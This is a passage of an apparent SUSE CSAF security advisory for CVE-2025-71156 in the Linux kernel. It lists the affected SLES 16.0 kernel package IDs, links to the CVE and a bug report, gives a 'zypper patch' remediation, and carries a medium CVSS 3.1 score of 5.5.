"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71156",
"url": "https://www.suse.com/security/cve/CVE-2025-71156"
},
{
"category": "external",
"summary": "SUSE Bug 1257167 for CVE-2025-71156",
"url": "https://bugzilla.suse.com/1257167"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
